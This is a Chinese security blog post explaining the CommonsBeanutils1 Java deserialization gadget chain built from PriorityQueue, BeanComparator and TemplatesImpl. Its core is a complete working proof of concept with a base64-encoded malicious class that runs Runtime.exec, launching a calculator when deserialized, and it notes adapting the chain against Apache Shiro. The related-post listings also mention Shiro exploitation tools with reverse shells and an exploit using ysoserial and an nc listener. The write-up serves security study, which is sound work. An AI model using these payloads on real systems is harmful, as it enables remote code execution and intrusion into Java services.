CommonsBeanutils

最新推荐文章于 2024-04-30 17:28:01 发布
最新推荐文章于 2024-04-30 17:28:01 发布
阅读量3.8k 收藏 2
点赞数
分类专栏: Java安全 文章标签: java 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53287512/article/details/127319215
版权

CommonsBeanutils

PriorityQueue+Commons Beanutils

Apache Commons Beanutils

Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。

JavaBean是一种符合命名规范的class,具体要求如下:

  • 若干个属性都是private类型
  • 并且这些属性都有public类型的get和set方法
  • 并且命名要符合规范,符合骆驼式命名法,比如说属性名为Xx,那么get方法为public Type getXx(),set方法为public void setXx(Type value)

JavaBean示例:

public class Name {
    private String name ="christina";
    private int age = 20;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }
}

idea可直接生成getter和setter,非常好用

image-20221014132511251

commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,比如:

import org.apache.commons.beanutils.PropertyUtils;

public class Go {
    public static void main(String[] args) throws Exception{
        Name name = new Name();
        System.out.println(PropertyUtils.getProperty(name,"name"));
        System.out.println(PropertyUtils.getProperty(name,"age"));
    }
}

此时,commons-beanutils会自动找到属性的getter方法,也就是 getName 和getAge,然后调用,获得返回值。

image-20221014132811544

除此之外, PropertyUtils.getProperty 还支持递归获取属性,比如a对象中有属性b,b对象中有属性c,我们可以通过 PropertyUtils.getProperty(a, “b.c”); 的方式进行递归获取。通过这个方法,使用者可以很方便地调用任意对象的getter,适用于在不确定JavaBean是哪个类对象时使用。

利用链的构造

回顾一下TemplatesImpl的构造链,

TemplatesImpl#newTransformer=>TemplatesImpl#getTransletInstance=>TemplatesImpl#defineTransletClasses=>TransletClassLoader#defineClass

我们的目的是调用TransletClassLoader#defineClass,但其是受保护的方法,所以我们一直向上寻找一个public的方法去调用它,最终找到了TemplatesImpl#newTransformer,而在TemplatesImpl中,有一个public方法可以直接去调用TemplatesImpl#newTransformer

image-20221014133229034

而这个方法为getter方法,那我们就可以尝试通过PropertyUtils.getProperty方法调用这个getter方法,最后构造完整的利用链。

梳理一下流程,首先反序列化入口PriorityQueue类中我们可以调用任意对象的compare方法,而我们要调用的这个compare方法中,最终要调用至PropertyUtils.getProperty方法,进而调用TemplatesImpl利用链。

在org.apache.commons.beanutils.BeanComparator中,其实现了java.util.Comparator接口,其中的compare方法可调用PropertyUtils.getProperty方法

image-20221014133916100

这个方法传入两个对象,如果 this.property 为空,则直接比较这两个对象;如果 this.property 不为空,则用 PropertyUtils.getProperty 分别取这两个对象的 this.property 属性,比较属性的值。

那我们直接来尝试构造:

首先创建TemplpatesImpl对象:

byte[] codes = Base64.getDecoder().decode("yv66vgAAADQAMQoADQAaCAAbCgAFABwIAB0HAB4KAAUAHwgAIAcAIQcAIgoAIwAkCAAlBwAmBwAn" +
                "AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHACgB" +
                "AAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9E" +
                "T007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXph" +
                "dGlvbkhhbmRsZXI7KVYHACkBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94" +
                "c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVy" +
                "YXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6" +
                "YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEACkhlbGxvLmphdmEMAA4ADwEAEWphdmEubGFu" +
                "Zy5SdW50aW1lDAAqACsBAApnZXRSdW50aW1lAQAPamF2YS9sYW5nL0NsYXNzDAAsAC0BAARleGVj" +
                "AQAQamF2YS9sYW5nL1N0cmluZwEAEGphdmEvbGFuZy9PYmplY3QHAC4MAC8AMAEABGNhbGMBAAtM" +
                "b2Rlci9IZWxsbwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50" +
                "aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcv" +
                "YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAHZm9yTmFtZQEA" +
                "JShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAEAoTGph" +
                "dmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRo" +
                "b2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2Jq" +
                "ZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7ACEADAANAAAAAAADAAEA" +
                "DgAPAAIAEAAAAHEABgAFAAAAQSq3AAESArgAA0wrEgQDvQAFtgAGTSsSBwS9AAVZAxIIU7YABk4s" +
                "KwO9AAm2AAo6BC0ZBAS9AAlZAxILU7YAClexAAAAAQARAAAAHgAHAAAADQAEAA4ACgAPABUAEAAl" +
                "ABEAMAASAEAAFQASAAAABAABABMAAQAUABUAAgAQAAAAGQAAAAMAAAABsQAAAAEAEQAAAAYAAQAA" +
                "ABcAEgAAAAQAAQAWAAEAFAAXAAIAEAAAABkAAAAEAAAAAbEAAAABABEAAAAGAAEAAAAZABIAAAAE" +
                "AAEAFgABABgAAAACABk=");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_bytecodes",new byte[][]{codes});
        setFieldValue(templates,"_name","c1");
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

然后实例化BeanComparator,这里构造函数为空,默认的 property就是空

BeanComparator comparator = new BeanComparator();

然后用这个comparator实例化优先队列 PriorityQueue:

PriorityQueue<Object> priorityQueue= new PriorityQueue<Object>(2,comparator);
priorityQueue.add(1);
priorityQueue.add(1);

向队列中添加了两个无害的对象,而由于之前的property为空,所以会对这两个对象排序。然后,用反射将property的值设置为outputProperties,并将队列中的两个对象替换成恶意的TemplatesImpl对象:

setFieldValue(comparator, "property", "outputProperties");
setFieldValue(priorityQueue, "queue", new Object[]{templates, templates});

至此,构造出完整的利用链:

package CCdemo;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class CommonsBeanutils1 {
    public static void setFieldValue(Object obj,String fieldName,Object Value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,Value);
    }
    public static void main(String[] args) throws Exception{
        byte[] codes = Base64.getDecoder().decode("yv66vgAAADQAMQoADQAaCAAbCgAFABwIAB0HAB4KAAUAHwgAIAcAIQcAIgoAIwAkCAAlBwAmBwAn" +
                "AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHACgB" +
                "AAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9E" +
                "T007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXph" +
                "dGlvbkhhbmRsZXI7KVYHACkBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94" +
                "c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVy" +
                "YXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6" +
                "YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEACkhlbGxvLmphdmEMAA4ADwEAEWphdmEubGFu" +
                "Zy5SdW50aW1lDAAqACsBAApnZXRSdW50aW1lAQAPamF2YS9sYW5nL0NsYXNzDAAsAC0BAARleGVj" +
                "AQAQamF2YS9sYW5nL1N0cmluZwEAEGphdmEvbGFuZy9PYmplY3QHAC4MAC8AMAEABGNhbGMBAAtM" +
                "b2Rlci9IZWxsbwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50" +
                "aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcv" +
                "YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAHZm9yTmFtZQEA" +
                "JShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAEAoTGph" +
                "dmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRo" +
                "b2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2Jq" +
                "ZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7ACEADAANAAAAAAADAAEA" +
                "DgAPAAIAEAAAAHEABgAFAAAAQSq3AAESArgAA0wrEgQDvQAFtgAGTSsSBwS9AAVZAxIIU7YABk4s" +
                "KwO9AAm2AAo6BC0ZBAS9AAlZAxILU7YAClexAAAAAQARAAAAHgAHAAAADQAEAA4ACgAPABUAEAAl" +
                "ABEAMAASAEAAFQASAAAABAABABMAAQAUABUAAgAQAAAAGQAAAAMAAAABsQAAAAEAEQAAAAYAAQAA" +
                "ABcAEgAAAAQAAQAWAAEAFAAXAAIAEAAAABkAAAAEAAAAAbEAAAABABEAAAAGAAEAAAAZABIAAAAE" +
                "AAEAFgABABgAAAACABk=");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_bytecodes",new byte[][]{codes});
        setFieldValue(templates,"_name","c1");
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        BeanComparator comparator = new BeanComparator();
        PriorityQueue<Object> priorityQueue= new PriorityQueue<Object>(2,comparator);
        priorityQueue.add(1);
        priorityQueue.add(1);
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(priorityQueue, "queue", new Object[]{templates, templates});
        // ==================
        // 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(priorityQueue);
        oos.close();
        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

成功弹出计算器

image-20221014134942467

而本条链经过简单改造,可以构造出无依赖Shiro反序列化利用链,具体看Shiro反序列化漏洞总结

参考:java安全漫谈-phith0n

Christ1na
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Commons-beanutils
LOST frequency的博客
02-28 647
Commons-beanutils 利用链分析
Shiro_Xray:CommonsBeanutils1,CommonsCollectionsK1
04-14
Shiro_Xray 小工具 CommonsBeanutils1 CommonsCollectionsK1 CommonsCollectionsK2 Getshell冰蝎 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import java.io.PrintWriter; import java.net.URLDecoder; import sun.misc.BASE64Decoder; public class 10837093162496 extends AbstractTranslet { static { Object var1 = null; String var2 = Thread.currentThread().getContextClassLoa
kingbase8.2和8.6版本
08-02
人大金仓数据库kingbase8数据库驱动: <dependency> <groupId>com.kingbase</groupId> <artifactId>kingbase8</artifactId> <version>8.2.0</version> </dependency> <dependency> <groupId>com.kingbase</groupId> <artifactId>kingbase8</artifactId> <version>8.6.0</version> </dependency> 直接放到你本地仓库下面即可。
ShiroRce-Burp
04-24
ShiroRce-Burp 集成了四种回显方式,一种反弹 shell方式 HttpRequest回显 Tomcat回显 Spring回显 DnsLog执行命令回显 回显手动加header头cmd 可选择cmd执行任意命令 选择ReverseShell为反弹 shell 原生java反弹shell可支持win 内置100key,8种Gadget可随意切换 CommonsBeanutils2只支持Tomcat、Spring、Http回显!!!
curator-recipes-4.3.0.jar
06-01
ZooKeeper 食谱文档中列出的所有食谱(两阶段提交除外)。 org.apache.curator/curator-recipes/4.3.0/curator-recipes-4.3.0.jar
netty-resolver-dns-4.1.68.Final-API文档-中文版.zip
06-04
赠送jar包:netty-resolver-dns-4.1.68.Final.jar; 赠送原API文档:netty-resolver-dns-4.1.68.Final-javadoc.jar; 赠送源代码:netty-resolver-dns-4.1.68.Final-sources.jar; 赠送Maven依赖信息文件:netty-resolver-dns-4.1.68.Final.pom; 包含翻译后的API文档:netty-resolver-dns-4.1.68.Final-javadoc-API文档-中文(简体)版.zip; Maven坐标:io.netty:netty-resolver-dns:4.1.68.Final; 标签:netty、resolver、dns、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
Unresolved dependency: 'com.aspose:aspose:jar:19'
11-03
在maven中配置的阿里云仓库无法下载com.aspose:aspose:jar:19,所以自己找的资源,很麻烦,为了方便兄弟们给你们了。
commons-beanutils所有版本(1.0-1.9.2).zip
10-13
commons-beanutils所有版本(1.0-1.9.2).zip
javacommons-beanutils的介绍
weixin_34038652的博客
05-24 442
1.   概述 commons-beanutil开源库是apache组织的一个基础的开源库。为apache中很多类提供工具方法。学习它是学习其它开源库实现的基础。 Commons-beanutil中包括大量和JavaBean操作有关的工具方法,使用它能够轻松利用Java反射机制来完毕代码中所须要的功能,而不须要具体研究反射的原理和使用,同一时候,该类库中提出了动态Bean的概念,不但提...
commons-beanutils
durenniu的博客
08-12 2281
内省(了解) 内省的目标是得到JavaBean属性的读、写方法的反射对象,通过反射对JavaBean属性进行操作的一组API。例如User类有名为username的JavaBean属性,通过两个Method对象(一个是getUsenrmae(),一个是setUsername())来操作User对象。 如果你还不能理解内省是什么,那么我们通过一个问题来了解内省的作用。现在我们有一个Map,内容如...
BeanUtilscommons-beanutils
林高禄
07-08 8386
这是一个把Map转为bean的工具 导包 Bean代码,Student类 package com.lingaolu.bena; /** * @author 林高禄 * @create 2020-07-08-20:01 */ public class Student { private String name; private int age; private Integer no; public String getName() {..
ShiroAttack4.5.3-master.zip
01-16
处理没有第三方依赖的情况 支持多版本CommonsBeanutils的gadget 支持内存马 采用直接回显执行命令 添加了更多的CommonsBeanutils版本gadget 支持修改rememberMe关键词 支持直接爆破利用gadget和key 支持代理 添加修改shirokey功能(使用内存马的方式)可能导致业务异常 支持内存马小马 添加DFS算法回显(AllECHO
dependency-lint:Lints NPM 依赖项和 devDependencies
08-04
依赖lint Lints 您的 NPM dependencies和devDependencies报告哪些节点模块是 缺少,应该添加到您的dependencies或devDependencies 未使用,应从您的dependencies或devDependencies 标签错误,应从dependencies移至devDependencies ,反之亦然 安装 在版本 12、14、16 上受支持 $ npm install dependency-lint 用法 $ dependency-lint 要自动删除未使用的依赖项并移动错误标记的依赖项: $ dependency-lint --auto-correct 这个怎么运作 dependency-lint比较package.json列出的节点模块和它确定使用的节点模块。 在以下情况下使用节点模块: 它在 javascript 文
CVE-2021-26295:CVE-2021-26295 EXP可成功反弹壳牌
03-25
CVE-2021-26295 CVE-2021-26295 EXP可成功反弹壳 本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。 触发命令执行EXP 1. VPS启动RMI监听9999端口 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] ' 2. VPS启动nc监听64444端口 nc -lvp 64444 3.执行python脚本 python3 cve-2021-26295_exp.py < target> < vps> < vps> 示例
Y4tacker#JavaSec#CommonsBeanutils1笔记1
07-25
CommonsBeanutils1笔记主要是有个比较好玩的地方在TemplatesImpl的getOutputProperties方法里面也调用了newTran
java方法重写(重点讲),方法重载
weixin_46281068的博客
04-27 930
一、方法重载定义:一个类中,出现多个方法的名称相同,但是它们的形参列表是不同的,那么这些方法就称为方法重载了。注意:一个类中,只要一些方法的名称相同、形参列表不同,那么它们就是方法重载了,其它的都不管(如:修饰符,返回值类型是否一样都无所谓)。形参列表不同指的是:形参的个数、类型、顺序不同,不关心形参的名称。应用场景:开发中我们经常需要为处理一类业务,提供多种解决方案,此时用方法重载来设计是很专业的。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 880
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
链表刷题集
最新发布
yajunjiao的专栏
04-30 278
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
Lambda表达式特点
weixin_57763462的博客
04-24 795
**API 设计**:Lambda 表达式鼓励使用函数式接口的设计模式,这改变了 Java 库的设计,例如 `java.util.function` 包下的一系列函数式接口。- **函数式编程**:Lambda 表达式引入了函数式编程的理念,使得 Java 更接近于函数式编程语言,如 Scala 和 Clojure。- **并发编程**:Lambda 表达式与 Java 8 新增的 Stream API 结合使用,可以简化并发编程,特别是与集合的操作相关。
shiro-721 代码执行
08-25
Shiro-721是一种Shiro框架的漏洞,攻击者可以利用该漏洞执行任意代码。为了利用Shiro-721漏洞,需要先获取一个有效的rememberMe Cookie,并将其作为输入参数提供给ShiroExploit Shiro-721工具。通过下载Shiro-721 Padding Oracle Attack工具,可以进行攻击的准备。在攻击前,可以使用ysoserial工具生成一个payload,例如使用CommonsBeanutils1生成一个执行ping命令的payload。最后,可以使用Apache Shiro 1.4.1和tomcat:8-jre8环境来进行Shiro-721代码执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[Vulhub] Apache Shiro 反序列化漏洞(shiro-550,shiro-721)](https://blog.csdn.net/weixin_45605352/article/details/116846678)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值